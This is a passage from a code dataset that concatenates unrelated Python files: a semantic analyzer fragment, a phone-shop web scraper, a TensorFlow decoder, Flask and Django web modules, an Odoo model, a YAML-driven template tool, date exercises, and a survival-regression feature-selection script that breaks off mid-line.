self._numerodelineas(linea) , \" valor del tipo de variable\",self.tabla.Search(nombre).getNombre(),\"no coincide\")\n else:\n if self._cualTipoes(self.tabla.Search(nombre).getTipo()) != str:\n print(\"Error en linea:\" , self._numerodelineas(linea) , \" valor del tipo de variable\",self.tabla.Search(nombre).getNombre(),\"no coincide\")\n if self.es_flotante(self.tabla.Search(nombre).getValor()) == True and self.tabla.Search(nombre).getValor().isdigit() == False:\n if self._cualTipoes(self.tabla.Search(nombre).getTipo()) != float:\n print(\"Error en linea:\" , self._numerodelineas(linea) , \" valor del tipo de variable\",self.tabla.Search(nombre).getNombre(),\"no coincide\")\n \n \n elif linea.count(\" \") == 2:\n nombre = linea.split(' ')[0].strip() \n for i in range(len(self.tokens)):\n if self.tabla.Search(nombre).getTipo() != self.tokens[i]:\n contador = contador + 1\n if contador == 4: \n if self.tabla.Search(nombre).getTipo() != None:\n print(\"Error en linea:\" , self._numerodelineas(linea) , \" Tipo de dato: \" , self.tabla.Search(nombre).getTipo() , \" no valido\")\n if self.tabla.Search(nombre).getTipo() == None:\n print(\"Error en linea:\" , self._numerodelineas(linea) ,\"La variable \", \"'\",self.tabla.Search(nombre).getNombre(),\"'\", \" No esta declarada\")\n contador = 0\n\n \n \n\n\n\n","sub_path":"Proyecto_2/Proyecto_2/AnalizadorSemantico.py","file_name":"AnalizadorSemantico.py","file_ext":"py","file_size_in_byte":18166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"461587205","text":"from bs4 import BeautifulSoup;\nimport requests ;\nimport json;\n\ndef makeRequestAndGetHtml(mobileSpecificationLink):\n clickedPhoneURL = mobileSpecificationLink;\n phoneSpecificationContent = requests.get(clickedPhoneURL);\n soup = BeautifulSoup(phoneSpecificationContent.text,\"html.parser\");\n return soup;\ndef getPhoneSpecification(mobileSpecificationLink):\n topSpecificationData = {}\n localTempArr = [];\n## clickedPhoneURL = mobileSpecificationLink;\n## phoneSpecificationContent = requests.get(clickedPhoneURL);\n soup = makeRequestAndGetHtml(mobileSpecificationLink);\n specificationData = (soup.find(\"div\", {\"class\": \"item-specification-top\"}).getText().replace(\"\\n\", \"\").strip());\n for topSpecficaion in soup.find_all('ul', {'class': 'specification-top'}):\n for litag in topSpecficaion.find_all('li'):\n## print(litag.find('span').getText());\n localTempArr.append(litag.find('span').getText())\n\n## print(localTempArr);\n topSpecificationData[\"camera\"] = localTempArr[0];\n topSpecificationData[\"battery\"] = localTempArr[1];\n topSpecificationData[\"os\"] = localTempArr[2];\n topSpecificationData[\"storage\"] = localTempArr[3];\n topSpecificationData[\"display\"] = localTempArr[4];\n return topSpecificationData;\n\n\ndef getFullPhoneSpec(mobileSpecificationLink):\n## Getting Full Sepc \n fullSpecificationData = {};\n## clickedPhoneURL = mobileSpecificationLink;\n## phoneSpecificationContent = requests.get(clickedPhoneURL);\n soup = makeRequestAndGetHtml(mobileSpecificationLink);\n specificationData = (soup.find(\"div\", {\"class\": \"item-specification\"}).getText().replace(\"\\n\", \"\").strip());\n for topSpecficaion in soup.find_all('ul', {'class': 'specification'}):\n for litag in topSpecficaion.find_all('li'):\n fullSpecificationData[litag.find('label').getText()] = litag.find('span').getText()\n## print(litag.find('label').getText());\n## print(litag.find('span').getText());\n\n## print(\"Full Spec\")\n## print(fullSpecificationData);\n## print(\"Full Spec\")\n return fullSpecificationData;\ndef getMemory(mobName):\n tempVar = mobName;\n if (tempVar.find('Samsung')):\n memory = {\"size1\":\"32 GB\",\"size2\":\"64 GB\",\"size3\":\"128 GB\"}\n return memory;\n else:\n memory = {\"size1\":\"64 GB\",\"size2\":\"128 GB\",\"size3\":\"256 GB\"}\n return memory;\n\ndef getColour(mobName):\n tempVar = mobName;\n if (tempVar.find('Samsung')):\n memory = {\"colour1\":\"Black\",\"colour2\":\"Blue\",\"colour1\":\"Grey\"}\n return memory;\n else:\n memory = {\"colour1\":\"Grey\",\"colour1\":\"Silver\"}\n return memory;\n \n \n## JSON file to be saved in DB\nphoneDataSet = {\"phones\":[]};\n\ntempArr = []\nurlArray = [\"https://eshop.lycamobile.co.uk/pay-as-you-go-mobile-phones?manufacturer=10&p=1\",\"https://eshop.lycamobile.co.uk/pay-as-you-go-mobile-phones?manufacturer=10&p=2\",\"https://eshop.lycamobile.co.uk/pay-as-you-go-mobile-phones?manufacturer=11\"]\nbase_url = \"https://eshop.lycamobile.co.uk/pay-as-you-go-mobile-phones\"\nmobileId = 100;\nfor url in urlArray:\n## print(url)\n content = requests.get(url);\n soup = BeautifulSoup(content.text,\"html.parser\");\n #print(soup);\n \n phoneData =soup.find_all(\"div\", {\"class\": \"product-item-info\"});\n## Loops through each mobile phone listen in the site. if there was 6mobile phones listed then loops 6\n for row in soup.find_all(\"div\", {\"class\": \"product-item-info\"}):\n mobName = (row.find(\"a\", {\"class\": \"product-item-link\"}).getText().replace(\"\\n\", \"\").strip());\n mobileSpecificationLink = ((row.find(\"a\", {\"class\": \"product-item-link\"}).get('href')));\n ##print((row.find(\"a\", {\"class\": \"product-item-link\"}).get('href')));\n \n mobPrice = (row.find(\"span\", {\"class\": \"price-wrapper \"}).getText().replace(\"\\n\", \"\").strip());\n mobStock = (row.find(\"div\", {\"class\": \"stock available\"}).getText().replace(\"\\n\", \"\").strip());\n \n## getColours(mobName);\n phoneDataSet['phones'].append({'mobileId':mobileId,'mobileName':mobName,\\\n 'mobilePrice':int(float(mobPrice.replace('£','').replace(',',''))),'mobileStock':mobStock, \\\n \"topSpec\":getPhoneSpecification(mobileSpecificationLink),\\\n \"fullSpec\":getFullPhoneSpec(mobileSpecificationLink),\\\n \"sizeVariant\":getMemory(mobName),\"colourVariant\":getColour(mobName)});\n mobileId = mobileId + 1;\n## break;\n print();\n \n\n## If getting price return this error 'NoneType' object has no attribute 'getText'\n## it means product is either out of stock or not sold anymore\n\n \nprint(phoneDataSet);\nwith open('data3.json', 'w') as fp:\n json.dump(phoneDataSet, fp)\n\n\n\n\n\n\n## Due to website using same class name for both size and colour im unable to get colour :(\ndef getColourVariants(mobileSpecificationLink):\n print(\"Getting Colour Variant\")\n soup = makeRequestAndGetHtml(mobileSpecificationLink);\n colourVariatnsData = (soup.find(\"div\", {\"class\": \"swatch-attribute-selected-option\"}));\n print(colourVariatnsData)\n\n#soup.find(\"div\", {\"class\": \"product-item-info\"});\n\n##data = {\"name\":\"Sameerul\"}\n##new_result = {'Mobile_Name':'Samsung S9+','Price':'£649.00'}\n##phoneDataSet['phones'].append(new_result)\n####print(phoneData)\n\n##new_result = {'Mobile_Name':'Samsung S7 Edge','Price':'£546.00','topSpecification':{'camera':'12mp'}}\n##phoneDataSet['phones'].append(new_result)\n##print(phoneDataSet)\n##with open('data.json', 'w') as fp:\n## json.dump(phoneDataSet, fp) \n \n","sub_path":"web_Scraping_2.py","file_name":"web_Scraping_2.py","file_ext":"py","file_size_in_byte":5680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"229669180","text":"import tensorflow as tf\nfrom tensorflow.contrib import distributions as distr\n\n\nclass SingleLayerDecoder(object):\n\n def __init__(self, config, is_train):\n self.batch_size = config.batch_size # batch size\n self.max_length = config.max_length # input sequence length (number of cities)\n self.input_dimension = config.hidden_dim\n self.input_embed = config.hidden_dim # dimension of embedding space (actor)\n self.max_length = config.max_length\n self.decoder_hidden_dim = config.decoder_hidden_dim\n self.initializer = tf.contrib.layers.xavier_initializer() # variables initializer\n self.decoder_activation = config.decoder_activation\n self.use_bias = config.use_bias\n self.bias_initial_value = config.bias_initial_value\n self.use_bias_constant = config.use_bias_constant\n\n self.is_training = is_train\n\n self.samples = []\n self.mask = 0\n self.mask_scores = []\n self.entropy = []\n\n def decode(self, encoder_output):\n # encoder_output is a tensor of size [batch_size, max_length, input_embed]\n with tf.variable_scope('singe_layer_nn'):\n W_l = tf.get_variable('weights_left', [self.input_embed, self.decoder_hidden_dim], initializer=self.initializer)\n W_r = tf.get_variable('weights_right', [self.input_embed, self.decoder_hidden_dim], initializer=self.initializer)\n U = tf.get_variable('U', [self.decoder_hidden_dim], initializer=self.initializer) # Aggregate across decoder hidden dim\n\n dot_l = tf.einsum('ijk, kl->ijl', encoder_output, W_l)\n dot_r = tf.einsum('ijk, kl->ijl', encoder_output, W_r)\n\n tiled_l = tf.tile(tf.expand_dims(dot_l, axis=2), (1, 1, self.max_length, 1))\n tiled_r = tf.tile(tf.expand_dims(dot_r, axis=1), (1, self.max_length, 1, 1))\n\n if self.decoder_activation == 'tanh': # Original implementation by paper\n final_sum = tf.nn.tanh(tiled_l + tiled_r)\n elif self.decoder_activation == 'relu':\n final_sum = tf.nn.relu(tiled_l + tiled_r)\n elif self.decoder_activation == 'none': # Without activation function\n final_sum = tiled_l + tiled_r\n else:\n raise NotImplementedError('Current decoder activation is not implemented yet')\n\n # final_sum is of shape (batch_size, max_length, max_length, decoder_hidden_dim)\n logits = tf.einsum('ijkl, l->ijk', final_sum, U) # Readability\n\n if self.bias_initial_value is None: # Randomly initialize the learnable bias\n self.logit_bias = tf.get_variable('logit_bias', [1])\n elif self.use_bias_constant: # Constant bias\n self.logit_bias = tf.constant([self.bias_initial_value], tf.float32, name='logit_bias')\n else: # Learnable bias with initial value\n self.logit_bias = tf.Variable([self.bias_initial_value], tf.float32, name='logit_bias')\n\n if self.use_bias: # Bias to control sparsity/density\n logits += self.logit_bias\n\n self.adj_prob = logits\n\n for i in range(self.max_length):\n position = tf.ones([encoder_output.shape[0]]) * i\n position = tf.cast(position, tf.int32)\n\n # Update mask\n self.mask = tf.one_hot(position, self.max_length)\n\n masked_score = self.adj_prob[:,i,:] - 100000000.*self.mask\n prob = distr.Bernoulli(masked_score) # probs input probability, logit input log_probability\n\n sampled_arr = prob.sample() # Batch_size, seqlenght for just one node\n\n self.samples.append(sampled_arr)\n self.mask_scores.append(masked_score)\n self.entropy.append(prob.entropy())\n\n return self.samples, self.mask_scores, self.entropy\n","sub_path":"research/Causal Discovery with RL/src/models/decoder/single_layer_decoder.py","file_name":"single_layer_decoder.py","file_ext":"py","file_size_in_byte":3800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"545653634","text":"from flask import current_app, Blueprint, session, g, request\nfrom ggfrc import models, db\nimport requests\n\nbp = Blueprint('persona', __name__, url_prefix=\"/_auth\")\n\n@bp.before_app_request\ndef get_current_user():\n g.user = None\n email = session.get('email')\n\n if email is not None:\n user = models.User.get_user_by_email(email)\n g.user = email\n\n@bp.route('/login', methods=['GET', 'POST'])\ndef login():\n\n resp = _verify_user(request.form['assertion'], request.host_url)\n\n if not resp or resp.ok:\n verification_data = resp.json()\n\n if verification_data['status'] == 'okay':\n email = verification_data['email']\n\n # This user has never logged in before\n if not models.User.get_user_by_email(email):\n user = models.User(email=email)\n db.session.add(user)\n saved = db.session.commit()\n\n if not saved:\n return \"USER NOT CREATED\", 500\n else:\n session['email'] = email\n\n return 'OK'\n\n abort(400)\n\n\ndef _verify_user(assertion, audience):\n\n if not assertion and not audience:\n raise RuntimeError(\"Cannot assert nothing\")\n\n return requests.post(current_app.iniconfig.get('persona', 'PERSONA_VERIFIER'), data={\n 'assertion': assertion,\n 'audience': audience\n }, verify=True)\n\n@bp.route('/logout', methods=['POST'])\ndef logout():\n session.clear()\n return 'OK'\n","sub_path":"ggfrc/blueprints/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"277125680","text":"\"\"\"Define url paths used for learning_logs\"\"\"\nfrom django.urls import path,re_path\nfrom . import views\n\nurlpatterns = [\n\t\t\t\t#home page\n\t\t\t\tpath('',views.index, name='index'),\n\t\t\t\t\n\t\t\t\t#show topics\n\t\t\t\tpath('topics/', views.topics, name='topics'),\n\t\t\t\t\n\t\t\t\t#detail in topic\n\t\t\t\tre_path('topics/(?P\\d+)/', views.topic, name='topic'),\n\t\t\t\t\n\t\t\t\t#page for adding a new topic\n\t\t\t\tpath('new_topic/', views.new_topic, name='new_topic'),\n\t\t\t\t\n\t\t\t\t#page for adding a new entry\n\t\t\t\tre_path('new_entry/(?P\\d+)/', views.new_entry, name='new_entry'),\n\t\t\t\t\n\t\t\t\tre_path('edit_entry/(?P\\d+)/', views.edit_entry, name='edit_entry')\n\t\t\t\t\n\t\t\t\t]\n\napp_name = 'learning_logs'\n","sub_path":"learning_logs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"476894601","text":"import numpy as np\nfrom PIL import Image\n\ndef array_img_save(array, save_path, normal=True, binary=False):\n if binary:\n array[array > 0.5] = 1\n array[array <= 0.5] = 0\n\n if normal:\n array = array * 255\n\n if np.shape(array)[2] == 1:\n array = np.tile(array, [1, 1, 3])\n\n array = array.astype(np.uint8)\n img = Image.fromarray(array)\n img.save(save_path)","sub_path":"TF_Build/TF_Build/tool/tool.py","file_name":"tool.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"300411309","text":"# -*- coding: utf-8 -*-\n# (c) 2014 scosist\n# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html\n\nfrom odoo import models, fields, api\nimport odoo.addons.decimal_precision as dp\n\n\nclass SimulatedPickProduct(models.TransientModel):\n _name = 'simulated.pick.product'\n\n sim_prod_id = fields.Many2one(\n comodel_name='product.product',\n string='Simulated Product',\n required=True,\n ondelete=\"no action\",\n index=True)\n\n product_id = fields.Many2one(\n comodel_name='product.product',\n string='Product',\n required=True,\n ondelete=\"no action\",\n index=True)\n\n product_qty = fields.Float(\n string=\"Req'd Qty\",\n digits=dp.get_precision('Product Unit of Measure'),\n required=True)\n\n on_hand_before = fields.Float(\n string='On-Hand Before',\n digits=dp.get_precision('Product Unit of Measure'),\n required=True)\n\n on_hand_after = fields.Float(\n string='On-Hand After',\n digits=dp.get_precision('Product Unit of Measure'),\n required=True)\n\n short = fields.Float(\n string='Short',\n digits=dp.get_precision('Product Unit of Measure'),\n required=True)\n\n proc_action = fields.Char(string='Action')\n\n routing_detail = fields.Char(string=\"Routing Detail\")\n\n categ_id = fields.Many2one(\n comodel_name='product.category',\n related='product_id.categ_id',\n string='Internal Category',\n store=True)\n\n product_uom = fields.Many2one(\n comodel_name='product.uom',\n related='product_id.uom_id',\n string='UoM',\n store=True)\n\n default_supplier_id = fields.Many2one(\n comodel_name='res.partner',\n string='Supplier',\n compute='_compute_default_supplier',\n readonly=True,\n index=True,\n store=True)\n\n @api.depends('product_id')\n def _compute_default_supplier(self):\n for line in self:\n line.default_supplier_id = line.product_id.seller_ids and line.product_id.seller_ids[0].name or False\n\n @api.multi\n def action_material_analysis(self):\n self.ensure_one()\n return self.product_id.action_material_analysis()\n","sub_path":"simulated_pick/models/simulated_pick_product.py","file_name":"simulated_pick_product.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"280931078","text":"import os\nimport yaml\nfrom .actions import *\nfrom .util import AnytException, CONFIG_FILE_EXT\n\n_valid_keys = {\n \"mkdir\": [\n \"name\",\n ],\n \"rm\": [\n \"name\"\n ],\n \"cp\": [\n \"src\",\n \"dest\",\n ],\n \"shell\": [\n \"command\",\n \"args\",\n ]\n }\n\nclass Template:\n def __init__(self, name, searchpaths):\n self.path, self.name = self._find_first_template(name, searchpaths)\n with open(f\"{self.path}/{self.name}.{CONFIG_FILE_EXT}\", \"r\") as template:\n self.template = template.read()\n\n def run(self, args=[]):\n if self.template is None:\n print(\"ERROR: template empty\")\n return\n self._preprocess(args)\n self._parse()\n\n def _preprocess(self, args):\n for num, arg in enumerate(args):\n self.template = self.template.replace(f\"$input{num}\", arg) #inputs\n self.template = self.template.replace(\"$tp\", f\"{self.path}\") #template path\n self.template = self.template.replace(\"$cwd\", f\"{os.getcwd()}\") #current working directory\n\n @staticmethod\n def _loop_templates(paths):\n for path in paths:\n for dirpath, _, files in os.walk(path):\n for file in files:\n filename, fileext = os.path.splitext(file)\n dirname = os.path.basename(dirpath)\n if fileext == f\".{CONFIG_FILE_EXT}\" and filename == dirname:\n yield (dirpath, filename)\n\n @staticmethod\n def _find_first_template(name, paths):\n for tpath, tname in Template._loop_templates(paths):\n if name == tname:\n return (tpath, tname)\n raise AnytException(f\"ERROR: no template found by the name \\\"{name}\\\"\")\n \n @staticmethod\n def find_all_templates(paths):\n templates = 0\n for tpath, tname in Template._loop_templates(paths):\n yield tname\n templates += 1\n if templates == 0:\n raise AnytException(f\"WARNING: no templates found\")\n\n def _parse(self):\n template = yaml.load(self.template, Loader=yaml.FullLoader)\n if template == None:\n raise AnytException(f\"ERROR: template empty\")\n for action in template:\n if action[\"type\"] == \"mkdir\":\n mkdir(action[\"name\"])\n if action[\"type\"] == \"rm\":\n rm(action[\"name\"], action[\"recursive\"])\n if action[\"type\"] == \"cp\":\n copypaste(action[\"src\"], action[\"dest\"])\n if action[\"type\"] == \"shell\":\n shell(action[\"command\"], action[\"args\"])\n","sub_path":"anytialize/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"266556498","text":"# -*- coding: utf-8 -*-\n\nimport unittest\nimport os.path\n\nfrom kivy.lang import Builder\n\nfrom from_to import FromToWidget\nfrom presenter_mock import PresenterMock\nfrom model.gamestate import *\n\n\nclass FromToTest(unittest.TestCase):\n def setUp(self):\n players = Players([Player('Andrey', []), Player('Boris', []),\n Player('Charlie', []), Player('Dmitry', [])])\n players.set_next_pair_strategy(TraditionalStrategy(players.players))\n hat = Hat(['стул', 'шапка', 'кастрюлька'])\n game_round = GameRound(20, [], '', (players.players[0],\n players.players[2]))\n self.gamestate = GameState(players, hat, game_round,\n 0, [], None,\n Settings(20, 30))\n self.presenter = PresenterMock(Phase.COUNTDOWN)\n\n def test_round_creation_and_button_press(self):\n self.gamestate.game_round = None\n widget = FromToWidget(self.gamestate, self.presenter)\n self.assertEquals(self.presenter.is_phase_changed, False)\n self.assertEquals(self.gamestate.game_round.players_pair,\n (self.gamestate.players.players[0],\n self.gamestate.players.players[2]))\n self.assertEquals(self.presenter.is_phase_changed, False)\n widget.finish()\n self.assertEquals(self.presenter.is_phase_changed, True)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"ui/from_to_test.py","file_name":"from_to_test.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"456796181","text":"# Hint: use Google to find python function\nimport time\nimport calendar\nfrom datetime import date\n####a) \ndate_start = '01-02-2013' \ndate_stop = '07-28-2015' \n\ndate_start_list = date_start.split(\"-\")\ndate_start_list = [ int(x) for x in date_start_list]\ndate_stop_list = date_stop.split(\"-\")\ndate_stop_list = [ int(x) for x in date_stop_list]\ndays_between = date(date_stop_list[2], date_stop_list[0], date_stop_list[1]) - date(date_start_list[2], date_start_list[0], date_start_list[1])\n\nprint (days_between.days, \"days\")\n####b) \ndate_start = '12312013' \ndate_stop = '05282015' \n\ndays_between = date(int(date_stop[4:]), int(date_stop[0:2]), int(date_stop[2:4])) - date(int(date_start[4:]), int(date_start[0:2]), int(date_start[2:4]))\n\nprint (days_between.days, \"days\")\n\n####c) \ndate_start = '15-Jan-1994' \ndate_stop = '14-Jul-2015' \n\ndate_start_list = date_start.split(\"-\")\ndate_stop_list = date_stop.split(\"-\")\n\ndays_between = date(int(date_stop_list[2]), list(calendar.month_abbr).index(date_stop_list[1]), int(date_stop_list[0])) - date(int(date_start_list[2]), list(calendar.month_abbr).index(date_stop_list[1]), int(date_start_list[0]))\n\n\nprint (days_between.days, \"days\")\n","sub_path":"python/q5_datetime.py","file_name":"q5_datetime.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"574817058","text":"\r\nimport pandas as pd \r\n\r\nf = open(\"D:\\Latest programs & data that work -in IDLE-/1st 495 symbols.csv\", \"r\")\r\n\r\n\r\ndf_old = pd.read_csv(\"A.csv\")\r\nprint(df_old.head())\r\ndf_old.drop([\"volume\", \"timestamp\", \"open\", \"high\", \"low\"], axis = 1, inplace = True)\r\nprint(df_old.head())\r\n\r\n'''\r\nfor symbol in f.readlines():\r\n\r\n symbol = symbol.strip()\r\n\r\n url_part1 = symbol\r\n url_part2 = \".csv\"\r\n url = url_part1 + url_part2 \r\n print(url)\r\n df_old = pd.read_csv(url)\r\n df_old.head()\r\n #sdf_old.drop([\"volume\", \"timestamp\", \"open\", \"high\", \"low\"], axis = 1, inplace = True)'''\r\n \r\n \r\n\r\n","sub_path":"Column grouper thingie V1.py","file_name":"Column grouper thingie V1.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"578560639","text":"#!/home/yannick/anaconda3/envs/py36/bin/python\n\n\nimport json\nimport numpy as np\nimport os\nimport pandas as pd\nfrom skfeature.function.information_theoretical_based import CIFE, JMI, DISR, MIM, CMIM, ICAP, MRMR, MIFS\nfrom skfeature.function.similarity_based import reliefF, fisher_score\nfrom skfeature.function.statistical_based import chi_square, gini_index\n\nfrom sklearn.ensemble.forest import RandomForestRegressor, ExtraTreesRegressor\nfrom sklearn.ensemble.bagging import BaggingRegressor\nfrom sklearn.experimental import enable_hist_gradient_boosting # noqa\nfrom sklearn.ensemble import HistGradientBoostingClassifier\n\nfrom sklearn.ensemble.weight_boosting import AdaBoostRegressor\nfrom sklearn.gaussian_process.gpr import GaussianProcessRegressor\nfrom sklearn.isotonic import IsotonicRegression\nfrom sklearn.linear_model.bayes import ARDRegression\nfrom sklearn.linear_model.huber import HuberRegressor\nfrom sklearn.linear_model.base import LinearRegression\nfrom sklearn.linear_model.passive_aggressive import PassiveAggressiveRegressor\nfrom sklearn.linear_model.stochastic_gradient import SGDRegressor\nfrom sklearn.linear_model.theil_sen import TheilSenRegressor\nfrom sklearn.linear_model.ransac import RANSACRegressor\nfrom sklearn.neighbors.regression import KNeighborsRegressor\nfrom sklearn.neighbors.regression import RadiusNeighborsRegressor\nfrom sklearn.neural_network.multilayer_perceptron import MLPRegressor\nfrom sklearn.tree.tree import DecisionTreeRegressor, ExtraTreeRegressor\nfrom sklearn.svm.classes import SVR\n\nfrom sklearn.metrics import accuracy_score, balanced_accuracy_score, mean_squared_error, r2_score\nfrom scipy.stats import spearmanr # spearmanr(currttpdata_bratumia[\"TTP\"].values, currttpdata_bratumia[\"OS\"].values, nan_policy='omit')\n\nfrom tqdm import tqdm\n\n\ndef survival_classencoding(survarr: np.array, classboundaries: list):\n if len(classboundaries) == 1:\n survival_classes = [0 if elem <= classboundaries[0] else 1 for elem in survarr]\n\n if len(classboundaries) == 2:\n survival_classes = [int(0) if elem <= classboundaries[0] else int(1) if elem <= classboundaries[1] else int(2) for elem in\n survarr]\n\n return np.array(survival_classes)\n\n\ndef writeresults(outdf, sel_name, clf_name, split, param1, param2, acc, balacc, mse, r2, rho):\n curr_resultsdict = {\"Feature selector\": sel_name,\n \"ML method\": clf_name,\n \"Split\": split,\n \"Parameter1\": param1,\n \"Parameter2\": param2,\n \"Accuracy\": acc,\n \"Balanced Accuracy\": balacc,\n \"MSE\": mse,\n \"r2\": r2,\n \"spearmanr\": rho\n }\n\n outdf = outdf.append(curr_resultsdict, ignore_index=True)\n print(outdf)\n outdf.to_csv(\n \"/media/yannick/c4a7e8d3-9ac5-463f-b6e6-92e216ae6ac0/BRATS/BraTS2020/featsel_outputs/cvresults_seqprior_regression.csv\",\n index=False)\n\n return outdf\n\n\ndef gradeoutput(y_test, y_pred, class_boundary):\n\n y_test_classes = survival_classencoding(y_test, class_boundary)\n y_pred_classes = survival_classencoding(y_pred, class_boundary)\n acc = accuracy_score(y_test_classes, y_pred_classes)\n balacc = balanced_accuracy_score(y_test_classes, y_pred_classes)\n mse = mean_squared_error(y_test, y_pred)\n r2 = r2_score(y_test, y_pred)\n rho, _ = spearmanr(y_test, y_pred, nan_policy='omit')\n\n return [balacc, acc, mse, r2, rho]\n\n\nclass_boundary = [304.2, 456.25]\n\n# features = pd.read_csv(\"/media/yannick/c4a7e8d3-9ac5-463f-b6e6-92e216ae6ac0/BRATS/BraTS2020/featsel_outputs/training_scaledfeat.csv\", index_col=\"ID\")\nfeatures = pd.read_csv(\"/media/yannick/c4a7e8d3-9ac5-463f-b6e6-92e216ae6ac0/BRATS/BraTS2020/featsel_outputs/training_scaledfeat2.csv\", index_col=\"ID\")\nsplitinfopath = \"/media/yannick/c4a7e8d3-9ac5-463f-b6e6-92e216ae6ac0/BRATS/BraTS2020/featsel_outputs/splitinfo.json\"\n\nfeatures_nosurv = features.drop(columns=\"Survival_days\", inplace=False)\nsurv_days = features[\"Survival_days\"]\nsurv_classes = survival_classencoding(surv_days, class_boundary)\n\n# only use features from the T1c and FLAIR MRIs\ncolselect = [elem for elem in features_nosurv.columns if (('T1c' in elem) or (\"FLAIR\" in elem) or (\"Age\" in elem) or (\"z_mincet\" in elem) or (\"cet_ventrdist\" in elem))]\ndropcols = list(set(features_nosurv.columns) - set(colselect))\nfeatures_nosurv.drop(columns=dropcols, inplace=True)\nnp.random.seed(42)\n\n# load split infos\nwith open(splitinfopath) as f:\n kfolds = json.load(f)\n\nnumfeat = 9\n\nrandomstate = 42\nclassifiernames = [\"Random Forest\",\n \"Extra Trees\",\n # \"Hist. Gradient Boosting\",\n \"AdaBoost\",\n \"Gaussian Process\",\n \"ARD\",\n # \"Huber\",\n \"Linear\",\n \"Passive Aggressive\",\n \"SGD\",\n \"Theil-Sen\",\n \"RANSAC\",\n \"K-Neighbors\",\n \"Radius Neighbors\",\n \"MLP\",\n \"Decision Tree\",\n \"Extra Tree\",\n \"SVR\"\n ]\n\nclassifiers = [\n RandomForestRegressor(n_estimators=200, n_jobs=5, random_state=randomstate),\n ExtraTreesRegressor(n_estimators=200, n_jobs=5, random_state=randomstate),\n # GradientBoostingRegressor(random_state=randomstate), # learning_rate is a hyper-parameter in the range (0.0, 1.0]\n # HistGradientBoostingClassifier(random_state=randomstate), # learning_rate is a hyper-parameter in the range (0.0, 1.0]\n AdaBoostRegressor(n_estimators=200, random_state=randomstate),\n GaussianProcessRegressor(normalize_y=True),\n ARDRegression(),\n # HuberRegressor(), # epsilon: greater than 1.0, default 1.35\n LinearRegression(n_jobs=5),\n PassiveAggressiveRegressor(random_state=randomstate), # C: 0.25, 0.5, 1, 5, 10\n SGDRegressor(random_state=randomstate),\n TheilSenRegressor(n_jobs=5, random_state=randomstate),\n RANSACRegressor(random_state=randomstate),\n KNeighborsRegressor(weights='distance'), # n_neighbors: 3, 6, 9, 12, 15, 20\n RadiusNeighborsRegressor(weights='distance'), # radius: 1, 2, 5, 10, 15\n MLPRegressor(max_iter=10000000, random_state=randomstate),\n DecisionTreeRegressor(random_state=randomstate), # max_depth = 2, 3, 4, 6, 8\n ExtraTreeRegressor(random_state=randomstate), # max_depth = 2, 3, 4, 6, 8\n SVR() # C: 0.25, 0.5, 1, 5, 10\n]\n\nselectors = [\n reliefF.reliefF,\n fisher_score.fisher_score,\n chi_square.chi_square,\n JMI.jmi,\n CIFE.cife,\n DISR.disr,\n MIM.mim,\n CMIM.cmim,\n ICAP.icap,\n MRMR.mrmr,\n MIFS.mifs]\n\nselectornames_short = [\"RELF\", \"FSCR\", \"CHSQ\", \"JMI\", \"CIFE\", \"DISR\", \"MIM\", \"CMIM\", \"ICAP\", \"MRMR\", \"MIFS\"]\n\n# class boundary list\nclass_boundary = [304.2, 456.25]\nnumsplits = 10\n\n# Dataframe for highest balanced accuracy for each feature selector / ML combination\noutdf = pd.DataFrame(data=[], columns=[\"Feature selector\", \"ML method\", \"Split\", \"Parameter1\", \"Parameter2\", \"Accuracy\", \"Balanced Accuracy\", \"MSE\", \"r2\", \"spearmanr\"])\n\nfor split in np.arange(numsplits):\n print(\"Evaluating fold \" + str(split))\n train_index = kfolds[\"fold_\" + str(split)][\"train\"]\n test_index = kfolds[\"fold_\" + str(split)][\"test\"]\n\n X_train, X_test = features_nosurv.iloc[train_index], features_nosurv.iloc[test_index]\n y_train, y_test = surv_days[train_index], surv_days[test_index]\n # y_train, y_test = surv_classes[train_index], surv_classes[test_index]\n\n # for every split, perform feature selection\n for sel_name, sel in zip(selectornames_short, selectors):\n print('#####')\n print(sel_name)\n print('#####')\n\n if sel_name is \"CHSQ\":\n # shift X values to be non-negative for chsq feature selection\n X_train_tmp = X_train + np.abs(X_train.min())\n selscore = sel(X_train_tmp, y_train)\n selidx = np.argsort(selscore)[::-1]\n selidx = selidx[0:numfeat]\n selscore = selscore[selidx]\n selscoredf = pd.DataFrame(\n data=np.transpose(np.vstack((X_train.columns[selidx].values, selscore))),\n columns=['Feature', 'Score'])\n\n elif sel_name == \"RELF\":\n selscore = sel(X_train.values, y_train, k=numfeat)\n\n selidx = np.argsort(selscore)[::-1]\n # print(selidx)\n selidx = selidx[0:numfeat]\n selscoredf = pd.DataFrame(\n data=np.transpose(np.vstack((X_train.columns[selidx].values, selscore[selidx]))),\n columns=['Feature', 'Score'])\n\n elif sel_name == \"JMI\" or sel_name == \"CIFE\" or sel_name == \"DISR\" or sel_name == \"MIM\" \\\n or sel_name == \"CMIM\" or sel_name == \"ICAP\" or sel_name == \"MRMR\" or sel_name == \"MIFS\":\n selidx, selscore, _ = 